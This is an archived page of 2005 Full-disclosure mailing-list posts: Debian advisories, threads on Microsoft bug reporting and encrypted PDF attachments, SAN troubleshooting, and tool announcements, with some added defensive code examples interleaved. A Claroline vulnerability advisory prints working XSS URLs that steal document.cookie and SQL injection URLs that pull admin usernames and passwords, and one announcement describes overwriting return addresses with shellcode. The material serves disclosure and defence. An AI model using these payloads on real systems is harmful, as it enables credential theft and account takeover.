[Full-disclosure] [SECURITY] [DSA 715-1] New cvs packages fix unauthorised repository access

2005-04-27 Thread Martin Schulze
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA 715-1 [EMAIL PROTECTED]
http://www.debian.org/security/ Martin Schulze
April 27th, 2005                http://www.debian.org/security/faq
- --

Package: cvs
Vulnerability  : several
Problem-Type   : remote
Debian-specific: yes
CVE IDs: CAN-2004-1342 CAN-2004-1343
Debian Bug : 260200

Several problems have been discovered in the CVS server, which serves
the popular Concurrent Versions System.  The Common Vulnerability and
Exposures project identifies the following problems:

CAN-2004-1342

Maks Polunin and Alberto Garcia discovered independently that
using the pserver access method in connection with the repouid
patch that Debian uses it is possible to bypass the password and
gain access to the repository in question.

CAN-2004-1343

Alberto Garcia discovered that a remote user can cause the cvs
server to crash when the cvs-repouids file exists but does not
contain a mapping for the current repository, which can be used as
a denial of service attack.

For the stable distribution (woody) these problems have been fixed in
version 1.11.1p1debian-10.

For the unstable distribution (sid) these problems have been fixed in
version 1.12.9-11.

We recommend that you upgrade your cvs package.


Upgrade Instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.0 alias woody
- 

  Source archives:

http://security.debian.org/pool/updates/main/c/cvs/cvs_1.11.1p1debian-10.dsc
  Size/MD5 checksum:  683 59823fd39bbbe16620d03a946936885c

http://security.debian.org/pool/updates/main/c/cvs/cvs_1.11.1p1debian-10.diff.gz
  Size/MD5 checksum:    55952 02e1d3ce442838837defa5952f548582

http://security.debian.org/pool/updates/main/c/cvs/cvs_1.11.1p1debian.orig.tar.gz
  Size/MD5 checksum:  2621658 500965ab9702b31605f8c58aa21a6205

  Alpha architecture:


http://security.debian.org/pool/updates/main/c/cvs/cvs_1.11.1p1debian-10_alpha.deb
  Size/MD5 checksum:  1179144 9282b85f488096912601c02110ff40ad

  ARM architecture:


http://security.debian.org/pool/updates/main/c/cvs/cvs_1.11.1p1debian-10_arm.deb
  Size/MD5 checksum:  1106418 270ed04648a240ffe138c53dcc21e23f

  Intel IA-32 architecture:


http://security.debian.org/pool/updates/main/c/cvs/cvs_1.11.1p1debian-10_i386.deb
  Size/MD5 checksum:  1085370 a6a9d6e768bf94ff2d73f7c4297b4bfe

  Intel IA-64 architecture:


http://security.debian.org/pool/updates/main/c/cvs/cvs_1.11.1p1debian-10_ia64.deb
  Size/MD5 checksum:  1272522 843265de87691b70f7f3791b1de14787

  HP Precision architecture:


http://security.debian.org/pool/updates/main/c/cvs/cvs_1.11.1p1debian-10_hppa.deb
  Size/MD5 checksum:  1148284 7e28816777f07485cffcf2065e948c1d

  Motorola 680x0 architecture:


http://security.debian.org/pool/updates/main/c/cvs/cvs_1.11.1p1debian-10_m68k.deb
  Size/MD5 checksum:  1066564 62613fcbc6eddef7b4eb6103ef5849ae

  Big endian MIPS architecture:


http://security.debian.org/pool/updates/main/c/cvs/cvs_1.11.1p1debian-10_mips.deb
  Size/MD5 checksum:  1130690 a0b311ef90ea76653c119c729e6d9c79

  Little endian MIPS architecture:


http://security.debian.org/pool/updates/main/c/cvs/cvs_1.11.1p1debian-10_mipsel.deb
  Size/MD5 checksum:  1132148 e818238493b1b589410f802fc4166702

  PowerPC architecture:


http://security.debian.org/pool/updates/main/c/cvs/cvs_1.11.1p1debian-10_powerpc.deb
  Size/MD5 checksum:  1117054 887d8a61fc0f66bba26125aca927b6f4

  IBM S/390 architecture:


http://security.debian.org/pool/updates/main/c/cvs/cvs_1.11.1p1debian-10_s390.deb
  Size/MD5 checksum:  1097842 43799198fefec02e443e065d839b5530

  Sun Sparc architecture:


http://security.debian.org/pool/updates/main/c/cvs/cvs_1.11.1p1debian-10_sparc.deb
  Size/MD5 checksum:  1107744 a6cf45a0ea45609b1e1e9e381ec0b62e


  These files will probably be moved into the stable distribution on
  its next update.

- 
-
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security 
dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show pkg' and 

[Full-disclosure] [SECURITY] [DSA 716-1] New gaim packages fix denial of service

2005-04-27 Thread Martin Schulze
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA 716-1 [EMAIL PROTECTED]
http://www.debian.org/security/ Martin Schulze
April 27th, 2005                http://www.debian.org/security/faq
- --

Package: gaim
Vulnerability  : denial of service
Problem-Type   : remote
Debian-specific: no
CVE ID : CAN-2005-0472

It has been discovered that certain malformed SNAC packets sent by
other AIM or ICQ users can trigger an infinite loop in Gaim, a
multi-protocol instant messaging client, and hence lead to a denial of
service of the client.

Two more denial of service conditions have been discovered in newer
versions of Gaim which are fixed in the package in sid but are not
present in the package in woody.

For the stable distribution (woody) this problem has been fixed in
version 0.58-2.5.

For the unstable distribution (sid) these problems have been fixed in
version 1.1.3-1.

We recommend that you upgrade your gaim packages.


Upgrade Instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.0 alias woody
- 

  Source archives:

http://security.debian.org/pool/updates/main/g/gaim/gaim_0.58-2.5.dsc
  Size/MD5 checksum:  681 e985a045131d5ad43c2192533d581d49
http://security.debian.org/pool/updates/main/g/gaim/gaim_0.58-2.5.diff.gz
  Size/MD5 checksum:    23078 688d4d51bd00e863c4c911f539708f0d
http://security.debian.org/pool/updates/main/g/gaim/gaim_0.58.orig.tar.gz
  Size/MD5 checksum:  1928057 644df289daeca5f9dd3983d65c8b2407

  Alpha architecture:

http://security.debian.org/pool/updates/main/g/gaim/gaim_0.58-2.5_alpha.deb
  Size/MD5 checksum:   480588 297fed5e44fab4f49c3c103159ee3dc4

http://security.debian.org/pool/updates/main/g/gaim/gaim-common_0.58-2.5_alpha.deb
  Size/MD5 checksum:   674918 1a59dbf94b98f25c18eaeee28aab5910

http://security.debian.org/pool/updates/main/g/gaim/gaim-gnome_0.58-2.5_alpha.deb
  Size/MD5 checksum:   501450 bbe7cdac070bed0937596df34052c555

  ARM architecture:

http://security.debian.org/pool/updates/main/g/gaim/gaim_0.58-2.5_arm.deb
  Size/MD5 checksum:   401938 1f9588d2015c20477f35f59de2e67190

http://security.debian.org/pool/updates/main/g/gaim/gaim-common_0.58-2.5_arm.deb
  Size/MD5 checksum:   615258 6a1d88825004fb405881674236b5f34b

http://security.debian.org/pool/updates/main/g/gaim/gaim-gnome_0.58-2.5_arm.deb
  Size/MD5 checksum:   422646 eab79e46b080475268510509635388b2

  Intel IA-32 architecture:

http://security.debian.org/pool/updates/main/g/gaim/gaim_0.58-2.5_i386.deb
  Size/MD5 checksum:   389530 e4b3815727835a3ab112fb109a328021

http://security.debian.org/pool/updates/main/g/gaim/gaim-common_0.58-2.5_i386.deb
  Size/MD5 checksum:   605678 619283e7b98add8bf725beb71a3de75b

http://security.debian.org/pool/updates/main/g/gaim/gaim-gnome_0.58-2.5_i386.deb
  Size/MD5 checksum:   409274 c81aa5abd01455d0b082c6503e5abb32

  Intel IA-64 architecture:

http://security.debian.org/pool/updates/main/g/gaim/gaim_0.58-2.5_ia64.deb
  Size/MD5 checksum:   557214 f57cd6a3c35d2d7042690e5584d3c49c

http://security.debian.org/pool/updates/main/g/gaim/gaim-common_0.58-2.5_ia64.deb
  Size/MD5 checksum:   765410 33b7051caea6919c87519bc9c570ef69

http://security.debian.org/pool/updates/main/g/gaim/gaim-gnome_0.58-2.5_ia64.deb
  Size/MD5 checksum:   570064 2a9d5dbdd9b1bc7470d3a7a12cf3b453

  HP Precision architecture:

http://security.debian.org/pool/updates/main/g/gaim/gaim_0.58-2.5_hppa.deb
  Size/MD5 checksum:   459698 74a1621f52f73e436aeffc82e1c528a5

http://security.debian.org/pool/updates/main/g/gaim/gaim-common_0.58-2.5_hppa.deb
  Size/MD5 checksum:   691344 06a88c54e725114cb0818b50dce65fd5

http://security.debian.org/pool/updates/main/g/gaim/gaim-gnome_0.58-2.5_hppa.deb
  Size/MD5 checksum:   481568 5aaf2370d855711ae2d2916c13831f0b

  Motorola 680x0 architecture:

http://security.debian.org/pool/updates/main/g/gaim/gaim_0.58-2.5_m68k.deb
  Size/MD5 checksum:   370690 627841728dabb3c6e83e60c8001a0ac4

http://security.debian.org/pool/updates/main/g/gaim/gaim-common_0.58-2.5_m68k.deb
  Size/MD5 checksum:   622818 e4205658f157914fc5cea27c7248a71d

http://security.debian.org/pool/updates/main/g/gaim/gaim-gnome_0.58-2.5_m68k.deb
  Size/MD5 
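Both advisories above (DSA 715-1 and DSA 716-1) print a size and an MD5 for every file so that a manual download can be checked before `dpkg -i` touches it. The script below is an added example, not part of either DSA: it parses those "Size/MD5 checksum:" lines into a table keyed by file name and compares a downloaded file against it. The two entries in ADVISORY_SNIPPET are copied from DSA 715-1; the `b"hello\n"` bytes used in the self-check are constructed. One caveat: MD5 only tells you the file is the one the advisory text describes, and that text is trustworthy only because the mail is PGP-signed, so verify the signature first; a mismatch here means a corrupted or substituted download, not a verdict on the package's contents.

```python
"""Verify a downloaded Debian package against the Size/MD5 lines of a DSA.

Added example; not part of the advisory. ADVISORY_SNIPPET is copied from
DSA 715-1 above; the bytes fed to verify_bytes() in the self-check are
constructed sample data.
"""
import hashlib
import re
from typing import Dict, Optional, Tuple

# Two URL + checksum pairs exactly as printed in DSA 715-1.
ADVISORY_SNIPPET = """\
http://security.debian.org/pool/updates/main/c/cvs/cvs_1.11.1p1debian-10.dsc
  Size/MD5 checksum:  683 59823fd39bbbe16620d03a946936885c

http://security.debian.org/pool/updates/main/c/cvs/cvs_1.11.1p1debian-10_i386.deb
  Size/MD5 checksum:  1085370 a6a9d6e768bf94ff2d73f7c4297b4bfe
"""

_CHECKSUM_RE = re.compile(r"Size/MD5 checksum:\s*(\d+)\s+([0-9a-fA-F]{32})")


def parse_advisory_checksums(text: str) -> Dict[str, Tuple[int, str]]:
    """Map each file name in the advisory to its (size, md5) pair.

    The advisory prints a URL line followed by a 'Size/MD5 checksum:' line;
    the checksum belongs to the most recently seen URL.
    """
    expected: Dict[str, Tuple[int, str]] = {}
    current: Optional[str] = None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith(("http://", "https://", "ftp://")):
            current = line.rsplit("/", 1)[-1]
            continue
        m = _CHECKSUM_RE.search(line)
        if m and current:
            expected[current] = (int(m.group(1)), m.group(2).lower())
            current = None  # exactly one checksum line per URL
    return expected


def verify_bytes(data: bytes, expected_size: int, expected_md5: str) -> bool:
    """True only if both the byte length and the MD5 digest match."""
    if len(data) != expected_size:
        return False
    return hashlib.md5(data).hexdigest() == expected_md5.lower()


def verify_file(path: str, expected: Dict[str, Tuple[int, str]]) -> bool:
    """Check a downloaded file against the advisory table by its base name."""
    name = path.rsplit("/", 1)[-1]
    if name not in expected:
        raise KeyError(f"{name} is not listed in the advisory")
    with open(path, "rb") as fh:
        data = fh.read()
    size, md5 = expected[name]
    return verify_bytes(data, size, md5)


if __name__ == "__main__":
    import sys

    table = parse_advisory_checksums(ADVISORY_SNIPPET)
    for deb in sys.argv[1:]:
        verdict = "OK" if verify_file(deb, table) else "MISMATCH: do not dpkg -i"
        print(deb, verdict)
```

Paste the full "Size/MD5" section of the advisory into ADVISORY_SNIPPET (or read it from the saved mail) and run the script with the downloaded .deb paths as arguments; only install files that report OK.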

Re: [Full-disclosure] (no subject)

2005-04-27 Thread Day Jay
Man, ppl are such crybabies!

--- Paul Schmehl [EMAIL PROTECTED] wrote:
 --On Tuesday, April 26, 2005 03:05:29 PM -0400 Stan Bubrouski
 [EMAIL PROTECTED] wrote:
 
  Could we can the nazi rhetoric in messages on this list?  Or can we
  just complain until the list loses its hosting?
 
 That makes a great deal of sense.  One poster sends stuff you find
 offensive, so you want to shut down the entire list?
 
 Yeah, makes perfect sense.  Next you'll tell us you're going to take
 your ball and go home.
 
 Paul Schmehl ([EMAIL PROTECTED])
 Adjunct Information Security Officer
 The University of Texas at Dallas
 AVIEN Founding Member
 http://www.utdallas.edu
 ___
 Full-Disclosure - We believe in it.
 Charter:

http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia -
 http://secunia.com/
 



RE: [Full-disclosure] How to Report a Security Vulnerability to Microsoft

2005-04-27 Thread Gary O'leary-Steele
Hi,

I'm also trying to report a vulnerability to Microsoft but the site they
provide is broken.

When I fill out and send

https://www.microsoft.com/technet/security/bulletin/alertus.aspx

I get:

We’re sorry, but we were unable to service your request. You may wish to
choose from the links below for information about Microsoft products and
services.





-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] Behalf Of Kevin
Sent: 27 April 2005 00:11
To: Microsoft Security Response Center
Cc: full-disclosure@lists.grok.org.uk; [EMAIL PROTECTED]
Subject: Re: [Full-disclosure] How to Report a Security Vulnerability
to Microsoft


On a related note, today we ran into (headfirst) a bug in Internet
Explorer with the processing of AutoProxy scripts (Proxy Automatic
Configuration aka PAC, a specialized subset of javascript to make
client-side web proxy routing decisions).

Eventually I isolated the problem to a broken implementation of
dnsDomainIs() in Internet Explorer, so I decided to do the right thing
and report the bug to Microsoft.  This isn't a highly critical security
flaw, so I hunted around microsoft.com and eventually found the page
on bug reporting:  http://support.microsoft.com/gp/contactbug

The page states "If you think you have found a bug in a Microsoft
product, contact our Microsoft Product Support Services department.
(800) MICROSOFT (642-7676)."  No email address, no web form, just a
phone number.

So I call this number, and after five minutes of sitting through IVR
menus, I finally reach a live human.  She asks for my name and phone
number, and as soon as I mention that I am reporting a bug in Internet
Explorer, says she will transfer my call.

At that point I get fifteen seconds of music on hold, followed by dead
air.  That was a half hour ago.


Kevin Kadow

(P.S. Yes, this is definitely a bug in MSIE -- every other browser
I've tried handles dnsDomainIs() correctly, the sole exception is
MSIE).


RE: [Full-disclosure] How to Report a Security Vulnerability to Microsoft

2005-04-27 Thread Randal, Phil
See http://www.mckeay.net/secure/archives/000422.html

An email to [EMAIL PROTECTED] should do the trick.

Cheers,

Phil

Phil Randal
Network Engineer
Herefordshire Council
Hereford, UK  



Re: [Full-disclosure] How to Report a Security Vulnerability to Microsoft

2005-04-27 Thread [EMAIL PROTECTED]
They have published their contact some days ago: [EMAIL PROTECTED]


Re: [Full-disclosure] Re: email attack vector just got wider

2005-04-27 Thread Micheal Espinola Jr
Right, but do the AV vendors recognize an encrypted/password-protected PDF - like they would/could a compressed archive (ZIP, etc.)?

I haven't seen any that can. I'm using Symantec 9, and I'd be interested to know if anyone is using a competitor that addresses this issue directly.

Thanks,
On 4/26/05, Randall M [EMAIL PROTECTED] wrote:

Just my 2cents worth. About the only defense is using programs such as MailSecurity to block and alert when anything is encrypted or password protected.



thank you Randall M 
If we ever forget that we're one nation under God, then we will be a nation gone under. 
- Ronald Reagan _ 





From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] On Behalf Of Micheal Espinola Jr
Sent: Tuesday, April 26, 2005 11:56 AM
To: Full Disclosure
Subject: [Full-disclosure] Re: email attack vector just got wider


an update:

My latest finding is that Adobe PDF's with embedded attachments can be bundled and distributed as a Secure Electronic Envelope (eEnvelope). eEnvelopes are designed to protect documents in transit with the use of encryption. 


Password protected .ZIP's are typically addressed at the SMTP gateway by AV software with the option to strip or reject compressed file attachments that are not readily scan-able (due to the password protection, etc). 


Although Adobe recommends enabling scanning all file types in order to scan a PDF (and ass/u/me'ing its embedded contents as well), an AV scanner is not currently going to be able to scan this encrypted content until the content has been rendered/unencrypted at the desktop. 


While many AV vendors have factored certain compressed archive standards into their products, I have seen no indication that this is being addressed for this relatively new and already widely deployed product.


Call me a worry-wart, but I foresee this is the next in for malware distribution.
On 4/25/05, Micheal Espinola Jr [EMAIL PROTECTED] wrote: 

Perhaps not just. My apologies for those that are aware of this, but it seems Adobe 6 also had this capability - although many people have been unaware of this. I recently upgraded from 5 to 7, so I missed this potential issue from the get-go. 


Someone pointed out to me that Symantec does have a bulletin stating that by setting your AV to scan all files you can detect a virus inside a file embedded into a PDF.

Unfortunately, this does not address the blocking of certain attachments outright.

On 4/25/05, Micheal Espinola Jr [EMAIL PROTECTED] wrote: 

It seems most people I know haven't noticed that the new version of Adobe Acrobat (7) now allows for embedded/attached documents.

Since PDF's have generally been considered a safe document format and are typically not blocked by content/attachment scanners, this now opens an email-based attack vector that anti-virus providers [to the best of my knowledge] are not currently addressing. 

Many thanks to Adobe for creating another issue for us to deal with, and especially for not having the forethought to coordinate with anti-virus vendors to prepare for assuredly future exploitation of the technology. 

-- 
ME2
my home: http://www.santeriasys.net/
my photos: http://mespinola.blogspot.com/
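What a mail gateway can still see inside an encrypted PDF, as an added example that is not code from this thread or from any of the products named in it: PDF encryption covers strings and stream contents but not the dictionary names around them, so the /Encrypt entry in the trailer and the /Type /EmbeddedFile stream that holds an attachment remain visible to a raw byte scan even when the attachment itself cannot be scanned. The three sample documents are constructed by hand (not Acrobat output), and the verdict policy (reject anything encrypted, quarantine anything carrying an attachment) is the approach Randall M describes above, taken here as an assumption rather than any vendor's behaviour. The example also handles two evasions: names written with #xx hex escapes (/E#6DbeddedFile is the same name as /EmbeddedFile to a parser) and PDF 1.5 object streams, inside which non-stream dictionaries such as the /EmbeddedFiles name tree or a /FileAttachment annotation can be stored compressed and so escape a byte scan; the embedded-file object itself is a stream and cannot be hidden that way.

```python
"""Gateway-side triage of PDF attachments: encrypted? carries embedded files?

Added example, not from the thread. It pattern-matches the raw bytes of a
PDF for the dictionary keys that mark an encrypted document and embedded
or attached files. The sample documents below are hand-constructed.
"""
import re
from typing import Dict

# Constructed sample: nothing to flag.
CLEAN_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

# Constructed sample: encrypted document carrying an embedded executable
# (the eEnvelope case). Names stay in clear even though streams are encrypted.
ENVELOPE_PDF = b"""%PDF-1.6
1 0 obj << /Type /Catalog /Pages 2 0 R /Names << /EmbeddedFiles 4 0 R >> >> endobj
2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj
3 0 obj << /Type /EmbeddedFile /Length 4 >> stream
MZ\x90\x00
endstream endobj
4 0 obj << /Names [(payload.exe) << /Type /Filespec /F (payload.exe) /EF << /F 3 0 R >> >>] >> endobj
5 0 obj << /Filter /Standard /V 2 /R 3 /Length 128 >> endobj
trailer << /Root 1 0 R /Encrypt 5 0 R >>
%%EOF
"""

# Constructed sample: same attachment, name obfuscated with a #xx escape,
# plus an object stream in which the Filespec/name tree could be hidden.
OBFUSCATED_PDF = b"""%PDF-1.5
3 0 obj << /Type /E#6DbeddedFile /Length 4 >> stream
MZ\x90\x00
endstream endobj
6 0 obj << /Type /ObjStm /N 1 /First 10 /Length 0 >> stream
endstream endobj
trailer << /Root 1 0 R >>
%%EOF
"""

_NAME_ESCAPE = re.compile(rb"#([0-9A-Fa-f]{2})")


def normalise_names(data: bytes) -> bytes:
    """Expand #xx escapes so obfuscated name objects match the patterns.

    This is applied to the whole file, which may also alter binary stream
    bytes; that is harmless here because we only pattern-match, never parse.
    """
    return _NAME_ESCAPE.sub(lambda m: bytes([int(m.group(1), 16)]), data)


_PATTERNS = {
    "encrypted": re.compile(rb"/Encrypt\b"),                     # trailer entry
    "embedded_file": re.compile(rb"/Type\s*/EmbeddedFile\b"),    # attachment stream
    "file_attachment_annot": re.compile(rb"/Subtype\s*/FileAttachment\b"),
    "object_streams": re.compile(rb"/Type\s*/ObjStm\b"),         # compressed dicts
}


def scan_pdf(data: bytes) -> Dict[str, bool]:
    """Return one boolean per indicator found in the raw (name-normalised) bytes."""
    text = normalise_names(data)
    return {name: bool(pat.search(text)) for name, pat in _PATTERNS.items()}


def gateway_verdict(flags: Dict[str, bool]) -> str:
    """Policy assumed for this example: block what cannot be scanned here."""
    if flags["encrypted"]:
        return "reject"       # payload is unreadable until opened on the desktop
    if flags["embedded_file"] or flags["file_attachment_annot"]:
        return "quarantine"   # carries a file; hand it to a real PDF parser + AV
    if flags["object_streams"]:
        return "inspect"      # dictionaries may be compressed; byte scan is blind
    return "allow"
```

Run `gateway_verdict(scan_pdf(open(path, "rb").read()))` on each attachment at the SMTP gateway. The byte scan is a cheap first filter, not a parser: an "inspect" result means the file needs decompression of its object streams before a decision, and a clean result still says nothing about the PDF's own rendering-engine attack surface.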

[Full-disclosure] ZRCSA-200501 - Multiple vulnerabilities in Claroline

2005-04-27 Thread Siegfried



Zone-H Research Center Security Advisory 200501
http://fr.zone-h.org

Date of release: 27/04/2005

Software: Claroline (www.claroline.net)

Affected versions: 1.5.3, 1.6 beta, 1.6 Release Candidate 1
(probably previous versions too)

Risk: High

Discovered by: Kevin Fernandez "Siegfried", Mehdi Oudad "deepfear",
from the Zone-H Research Team

Background (from their web site)
--------------------------------
Claroline is an Open Source software based on PHP/MySQL. It's a
collaborative learning environment allowing teachers or education
institutions to create and administer courses through the web.

Description
-----------
Multiple Cross site scripting, 10 SQL injection, 7 directory traversal
and 4 remote file inclusion vulnerabilities have been found in Claroline.

Details
-------

1) Multiple Cross site scripting vulnerabilities have been found in the
following pages:
claroline/exercice/exercise_result.php
claroline/exercice/exercice_submit.php
claroline/calendar/myagenda.php
claroline/calendar/agenda.php
claroline/tracking/user_access_details.php
claroline/tracking/toolaccess_details.php
claroline/learnPath/learningPathList.php
claroline/learnPath/learningPathAdmin.php
claroline/learnPath/learningPath.php
claroline/tracking/userLog.php
[..]

Examples:
claroline/tracking/toolaccess_details.php?tool=%3Cscript%3Ealert('xss');%3C/script%3E
claroline/tracking/user_access_details.php?cmd=docdata=""
claroline/calendar/myagenda.php?coursePath=%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
[..]

2) 10 SQL injections have been found, they could be exploited by users to
retrieve the passwords of the admin, arbitrary teachers or students.
claroline/learnPath/learningPath.php (3)
claroline/tracking/exercises_details.php
claroline/learnPath/learningPathAdmin.php
claroline/tracking/learnPath_details.php
claroline/user/userInfo.php (2)
claroline/learnPath/modules_pool.php
claroline/learnPath/module.php

Examples:
claroline/user/userInfo.php?uInfo=-1%20UNION%20SELECT%20username,password,0,0,0,0,0%20from%20user%20where%20user_id=1/*
claroline/tracking/exercises_details.php?exo_id=-1/**/UNION/**/SELECT%200,password,username,0,0,0%20from%20user%20where%20user_id=1--
[..]

3) Multiple directory traversal vulnerabilities in
"claroline/document/document.php" and "claroline/learnPath/insertMyDoc.php"
could allow project administrators (teachers) to upload files in arbitrary
folders or copy/move/delete (then view) files of arbitrary folders by
performing directory traversal attacks.

4) Four remote file inclusion vulnerabilities have been discovered.

Solution
--------
The Claroline users are urged to update to version 1.54 or 1.6 final:
http://www.claroline.net/download.htm

See also:
http://www.claroline.net/news.php#85
http://www.claroline.net/news.php#86

Timeline
--------
18/04 Vulnerabilities found
22/04 Vendor contacted (quick answer)
25/04 Claroline 1.54 released
26/04 Claroline 1.6 final released
27/04 Users alerted via the mailing list
27/04 Advisory released

French version available here: http://fr.zone-h.org/fr/advisories/read/id=180/
English version: http://www.zone-h.org/advisories/read/id=7472

Zone-H Research Center
http://fr.zone-h.org

Join us on #zone-h @ irc.eu.freenode.net

You can contact the team leader at [EMAIL PROTECTED]

Thanks to University Montpellier 2.

[Full-disclosure] Maybe not a disclosure but request for information.

2005-04-27 Thread Leif Ericksen
I work with a bunch of HS20 Blades in an 8677 Chassis and we are using
the Qlogics cards (that was a mistake) connected to an IBM FAStT-900.

Talking to IBM with regards to my problems (blade and SAN related versus
personal!) I have found that there are known issues with the Qlogics
cards. I do not know if this is a Qlogics, FAStT or combo issue, BUT one
day you might be able to see your SAN, the next day you reboot and you
lose the SAN!  Even without making any changes to the servers! I was
told that this is fairly common but non-repeatable; as such Qlogics and
IBM have given up on finding a solution.

Full disclosure elements: working with QLogics and an IBM FAStT is a real
pain in the rear!
IBM wants tools on the servers to better build the qla2300.conf file,
but those tools require that you have no firewall installed and port
mapper has to be running, so I do not do that.

If I were to start this project over and if my voice carried any weight
in the final choice I would say we are NOT going to use Qlogics because
they are way too unreliable.

QUESTION:
I am trying to find list servers that might be able to answer my
questions and since I am feeling lazy (after being unsuccessful with
google thus far) I am asking here: does anybody know of (a) list server
(s) that fit the needs of managing a FAStT in a Linux environment?

IBM was fairly useless here as well.
-- 
Leif Ericksen [EMAIL PROTECTED]



Re: [Full-disclosure] Maybe not a disclosure but request for information.

2005-04-27 Thread Valdis . Kletnieks
On Wed, 27 Apr 2005 12:18:56 CDT, Leif Ericksen said:

 cards. I do not know if this is a Qlogics, fAStT or combo issue, BUT one
 day you might be able to see your SAN the next day you reboot and you
 lose the SAN!

OK. Now rephrase it as a computer security issue, so it's on-topic.  We may
drift off-topic on occasion, but what *vulnerability* is involved here,
other than the fact that QLogics gear does a better job of fellating donkeys
than actually doing what they were designed to do?



[Full-disclosure] iDEFENSE Labs Releases dltrace

2005-04-27 Thread iDEFENSE Labs
iDEFENSE Labs is pleased to announce the release of dltrace, a portable
dynamic library call tracer. dltrace attempts to remain portable to all
x86 platforms which support the execution of ELF binaries and expose a
debugging interface via procfs or the ptrace() system call. The shared
library call tracing is done at a level which allows all calls to all
exported symbols in loaded libraries to be traced. In addition, dltrace
does not rely on specific rtld exports to retrieve library and symbol
information and is capable of determining function arguments dynamically
via run-time disassembly.

dltrace has been released as open source and is available for download
from:

http://labs.idefense.com

Michael Sutton,
Director, iDEFENSE Labs


Re: [Full-disclosure] Maybe not a disclosure but request for information.

2005-04-27 Thread Michael Holstein
Full Disclosure : My SAN's broken .. lol .. if only every company in the 
world were so honest about their downtime.

It sounds like you're having a problem with redundant FC paths (when you 
setup a SAN with 2 cards per host, 2 switches, 2 controllers in the disk 
array, etc).

When I worked with IBM's SAN gear at a former employer (we also used 
Qlogic cards) there was an ESS path manager software (exact name 
escapes me) that we had to download off IBM's website. It was a device 
driver that handled masking of the inactive path (to avoid seeing twice 
the drives due to diverse paths).

We got it working on Windows and Solaris but never on Linux.
I should point out though that the qla[22|23|63]xx linux driver supports 
path diversity natively via the config file. However if you're booting 
off the FC drives (which, btw, isn't recommended by IBM) the BIOS on the 
Qlogic card takes impossibly long (5-10min) while it tries to talk to 
the inactive path LUNs.

This might help you to make a working qla2300.conf in linux for IBM's 
FAStT :

http://dag.wieers.com/home-made/qla-autoconf/
Cheers,
Michael Holstein CISSP GCIA
Cleveland State University.
Leif Ericksen wrote:
I work with a bunch of HS20 Blades in a 8677 Chassis and we are using
the Qlogics cards (that was a mistake) connected to an IBM FAStT-900.
Talking to IBM with regards to my problems (blade and san related versus
personal!) I have found that there are known issues with the Qlogics
cards. I do not know if this is a Qlogics, fAStT or combo issue, BUT one
day you might be able to see your SAN the next day you reboot and you
loose the SAN!  Even without making any changes to the servers! I was
told that this is a fairly common but non-repeatable as such Qlogcis and
IBM have given up on finding a solution.
Full disclosure elements working with QLogics and an IBM FAStT is a real
pain in the rear!
IBM wants tools on the servers to better build the qla2300.conf file,
but those tools require that you have no firewall installed and port
mapper has to be running so I do not do that.
If I were to start this project over and if my voice carried any weight
in the final choice I would say we are NOT going to use Qlogics because
they are way to unreliable.
QUESTION:
I am trying to find list servers that might be able to answer my
questions and since I am feeling lazy (after being unsuccessful with
google thus far) I am asking here does anybody know of (a) list server
(s) that fit the needs of managing a FAStT in a Linux environment.

IBM was fairly useless here as well.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] hPRoTeCT Labs Releases vulnfind

2005-04-27 Thread hprotect
hPRoTeCT Labs is pleased to announce the release of vulnfind, an 
automated universal vulnerability discovery and exploitation 
engine. vulnfind permits the universal and automated discovery of 
vulnerabilities across all Windows XP platforms via the 
instrumentation of shared library code responsible for virtually 
all vulnerabilities. An advanced 'detours' hook library instruments 
the shared library code responsible for 'strcpy', a major cause of 
vulnerabilities, and notifies when the saved frame pointer and 
return address ('ebp' and 'eip') will be compromised due to excess 
string length. In addition, vulnfind permits vulnerability 
discovery and penetration tests alike via run-time replacement of 
the compromised return address ('eip') with an address of memory-
resident shellcode resident in the memory of the process.

vulnfind is released as open 'c' source and it will be ported to 
'c++' in the coming weeks. vulnfind, along with over 250 other c, 
cpp, cxx, and h files written by hPRoTeCT staff, is available via 
the hPRoTeCT Labs home page, in addition to over 250 other 
projects.

The availability of additional projects will be announced to all 
mailing lists upon becoming available.

Wiley Miller
Product Manager, hPRoTeCT Labs





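The announcement above gives no code, so here is an added example, written for this page rather than taken from vulnfind, of the arithmetic such a strcpy hook has to perform: given the destination address, the caller's saved frame pointer and the source length, decide whether the NUL-terminated copy reaches the saved ebp or the return address. Assumptions: a 32-bit x86 frame with 4-byte words and the return address directly above the saved ebp; the frame is a constructed struct rather than a live stack, and a real detours hook would read the caller's ebp from the register at entry instead of taking it as a parameter.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* What the hooked strcpy reports about one call. */
enum verdict { COPY_SAFE = 0, COPY_HITS_SAVED_EBP = 1, COPY_HITS_RETURN_ADDR = 2 };

/* Assumption: 32-bit x86 frame, 4-byte words, return address right above saved ebp. */
#define FRAME_WORD 4u

/* strcpy writes the bytes [dst, dst + src_len + 1), NUL included.  The saved
 * frame pointer is the word at saved_ebp and the return address the word above
 * it; report the most damaging of the two that the copy reaches. */
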